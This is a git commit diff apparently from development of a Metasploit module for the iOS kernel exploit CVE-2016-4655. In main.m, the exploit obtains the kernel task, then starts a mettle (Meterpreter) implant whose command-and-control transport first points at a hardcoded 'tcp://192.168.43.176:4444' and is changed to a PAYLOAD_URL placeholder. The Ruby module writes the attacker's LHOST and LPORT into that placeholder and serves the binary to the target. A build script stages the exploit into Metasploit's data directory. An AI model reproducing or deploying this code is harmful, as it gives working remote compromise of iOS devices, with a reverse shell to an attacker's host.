add binary
parent
df60c5bb6b
commit
2ec7f11b90
|
@ -1,23 +1,5 @@
|
|||
/*
|
||||
* main.m - Helper file
|
||||
*
|
||||
* Copyright (c) 2017 Siguza & tihmstar
|
||||
*/
|
||||
|
||||
|
||||
#import <UIKit/UIKit.h>
|
||||
|
||||
//#include <errno.h>
|
||||
//#include <stdbool.h>
|
||||
//#include <stdio.h>
|
||||
//#include <string.h>
|
||||
//#include <unistd.h>
|
||||
//#include <spawn.h>
|
||||
//#include <sys/stat.h>
|
||||
//#include <mach/mach.h>
|
||||
|
||||
//#include <IOKit/IOKitLib.h>
|
||||
|
||||
#include "arch.h"
|
||||
#include "exploit64.h"
|
||||
#include "nvpatch.h"
|
||||
|
@ -49,69 +31,27 @@ void suspend_all_threads() {
|
|||
}
|
||||
}
|
||||
|
||||
/*
|
||||
extern char* const* environ;
|
||||
int easyPosixSpawn(NSURL *launchPath,NSArray *arguments){
|
||||
NSMutableArray *posixSpawnArguments=[arguments mutableCopy];
|
||||
[posixSpawnArguments insertObject:[launchPath lastPathComponent] atIndex:0];
|
||||
|
||||
int argc=(int)posixSpawnArguments.count+1;
|
||||
printf("Number of posix_spawn arguments: %d\n",argc);
|
||||
char **args=(char**)calloc(argc,sizeof(char *));
|
||||
|
||||
for (int i=0; i<posixSpawnArguments.count; i++)
|
||||
args[i]=(char *)[posixSpawnArguments[i]UTF8String];
|
||||
|
||||
printf("File exists at launch path: %d\n",[[NSFileManager defaultManager]fileExistsAtPath:launchPath.path]);
|
||||
printf("Executing %s: %s\n",launchPath.path.UTF8String,arguments.description.UTF8String);
|
||||
|
||||
posix_spawn_file_actions_t action;
|
||||
posix_spawn_file_actions_init(&action);
|
||||
|
||||
pid_t pid;
|
||||
int status;
|
||||
status = posix_spawn(&pid, launchPath.path.UTF8String, &action, NULL, args, environ);
|
||||
|
||||
if (status == 0) {
|
||||
if (waitpid(pid, &status, 0) != -1) {
|
||||
// wait
|
||||
}
|
||||
}
|
||||
|
||||
posix_spawn_file_actions_destroy(&action);
|
||||
|
||||
|
||||
return status;
|
||||
}
|
||||
*/
|
||||
const char payload_url[256] = "PAYLOAD_URL";
|
||||
|
||||
void start_mettle()
|
||||
{
|
||||
NSLog(@"start_mettle");
|
||||
struct mettle *m = mettle();
|
||||
if (m == NULL) {
|
||||
return;
|
||||
}
|
||||
|
||||
c2_add_transport_uri(mettle_get_c2(m), "tcp://192.168.43.176:4444");
|
||||
c2_add_transport_uri(mettle_get_c2(m), payload_url);
|
||||
|
||||
NSLog(@"mettle_start");
|
||||
mettle_start(m);
|
||||
|
||||
mettle_free(m);
|
||||
NSLog(@"mettle_done");
|
||||
}
|
||||
|
||||
int main(int argc, char * argv[]) {
|
||||
NSLog(@"hello from exploit");
|
||||
suspend_all_threads();
|
||||
NSLog(@"threads suspended");
|
||||
|
||||
//vm_address_t kbase = 0;
|
||||
//task_t kernel_task = get_kernel_task(&kbase);
|
||||
//LOG("kernel_task: 0x%x", kernel_task);
|
||||
vm_address_t kbase = 0;
|
||||
task_t kernel_task = get_kernel_task(&kbase);
|
||||
|
||||
NSLog(@"hello from uid %d", getuid());
|
||||
start_mettle();
|
||||
|
||||
return 0;
|
||||
|
|
|
@ -5,5 +5,6 @@ rsync -azPr -e "ssh -p2222" --delete . localhost:rsync/cve/
|
|||
ssh -p2222 localhost "bash -l -c 'cd rsync/cve && make main_vm' && echo Done!"
|
||||
rsync -azPr -e "ssh -p2222" --delete localhost:rsync/cve/ .
|
||||
ls -l main_vm
|
||||
make install
|
||||
cp main_vm ../../../../data/exploits/CVE-2016-4655/exploit
|
||||
|
||||
|
||||
|
|
|
@ -58,6 +58,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
elsif request.uri =~ %r{/exploit$}
|
||||
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" )
|
||||
loader_data = File.read(local_file, {:mode => 'rb'})
|
||||
payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
|
||||
payload_url_index = loader_data.index('PAYLOAD_URL')
|
||||
loader_data[payload_url_index, payload_url.length] = payload_url
|
||||
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
|
||||
print_status("Sent exploit (#{loader_data.size} bytes)")
|
||||
return
|
||||
|
|